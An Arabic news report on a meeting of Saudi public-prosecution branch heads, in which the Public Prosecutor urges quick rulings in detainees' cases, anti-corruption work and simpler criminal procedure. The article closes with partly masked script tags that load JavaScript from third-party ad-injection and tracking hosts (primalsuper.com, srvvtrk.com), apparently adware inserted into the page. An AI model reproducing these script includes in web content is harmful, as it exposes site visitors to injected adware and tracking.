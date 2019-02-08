شكرا لقرائتكم خبر عن النائب العام: البت في قضايا السجناء والموقوفين دون تأخير والان نبدء بالتفاصيل

تعزيز الثقافة القانونية والشراكة المجتمعية في ضوء الأنظمة والتعليمات

تطبيق أفضل الممارسات لتبسيط إجراءات الدعوى الجزائية وإدارتها بأسلوب ناجز

شدد النائب العام الشيخ سعود المعجب، على دور فروع النيابة العامة في تعزيز الثقافة القانونية والشراكة المجتمعية في ضوء الأنظمة والتعليمات المتعلقة بهذا الجانب، وفي سبيل الوصول لعدالة جزائية ناجزة يسرة، مؤكدا على الاهتمام بقضايا السجناء والموقوفين والبت فيها دون تأخير.

وأشاد خلال افتتاحه أمس الاجتماع الدوري لأصحاب الفضيلة رؤساء فروع النيابة العامة في مناطق المملكة في فرع النيابة العامة بمنطقة مكة المكرمة، بحضور وكيل النيابة العامة الشيخ شلعان الشلعان، بالعلاقة المميزة بين فروع النيابة والجهات الحكومية، مؤكدا أهمية تطويرها وزيادة التواصل فيما يخدم مصلحة العمل إنفاذا لتوجهات ولاة الأمر -وفقهم الله-.

ورفع النائب العام الشكر والعرفان لخادم الحرمين الشريفين الملك سلمان بن عبدالعزيز آل سعود، وسمو ولي عهده الأمين -أيدهما الله- على دعمهما الكبير وغير المحدود والمتواصل للنيابة العامة وما تحظى به من اهتمام بالغ للارتقاء بأعمالها، مؤكدا أهمية عقد هذا الاجتماع بشكل دوري لمناقشة أعمال النيابة العامة بما يحقق تطلعات ولاة الأمر. ونوه معاليه بما تحقق في مسيرة النيابة خلال الفترة الماضية من نقله نوعية، وإنجازات فريدة في شتى المجالات وخصوصا في مجال المساءلة في مجال قضايا الفساد بما يحافظ على المال العام ومقدرات الوطن ويحمي نزاهة الوظيفة العامة، وكذلك في مجال التقنية وبرامج التحول الوطني، ومواكبة رؤية المملكة، داعيا إلى مواصلة السير لتحقيق مزيد من التقدم في هذا المجال، وبين خلال كلمته أهمية أن تقوم الفروع بأعمالها المنوطة بها، مؤكدا على الشفافية في التعامل، والاهتمام بالمراجعين وسرعة إنجاز معاملاتهم واللقاء بهم وسماع ما لديهم، مؤكدا على إعمال أفضل الممارسات في تبسيط إجراءات الدعوى الجزائية وإدارتها بأسلوب ناجز، وتنفيذ أفضل التطبيقات الحديثة في هذا الشأن وفقا لأعلى معايير ومقاييس الجودة الدولية، وتشخيص الواقع وملاءمته وتطويعه لذلك، ووضع خطط إستراتيجية شاملة لكافة تلك الأعمال وما قد يطرأ عليها من متغيرات.

وناقش الاجتماع عددا من الموضوعات المطروحة على جدول الأعمال، وشكر النائب العام الجميع على ما يبذلونه من جهد، مذكرا إياهم بالأمانة الجسيمة التي يحملونها والمسؤولية الكبيرة التي على عاتقهم، وأهمية تضافر الجهود وتوحيد المساعي وتعاضد البُنى وتلاحم المسيرة في هذا الصدد.

ويأتي الاجتماع في ظل سياسة المتابعة الدورية لسير العمل وبحث المسائل والإستراتيجيات المتعلقة بالفروع وزيارتها، ودعم أعمال النيابة العامة بتلمس الاحتياجات وتلبيتها والاستماع إلى رؤى ومقترحات أصحاب الفضيلة رؤساء الفروع في الميدان. ******** async="" src="//1046663444.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="//1018433480.rsc.cdn77.org/1fd3b038f796d0b159.js">******** ******** src="https://primalsuper.com/optout/set/lat?jsonp=__twb_cb_651150829&key=1fd3b038f796d0b159&cv=1549549623&t=1549549622775" type="text/javascript">******** ******** src="https://primalsuper.com/optout/set/lt?jsonp=__twb_cb_510503447&key=1fd3b038f796d0b159&cv=24453&t=1549549622775" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr5.min.js" type="text/javascript">******** ******** src="https://srvvtrk.com/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51968x8147x&r=1549549622779" type="text/javascript">******** ******** src="https://primalsuper.com/addons/lnkr30_nt.min.js" type="text/javascript">********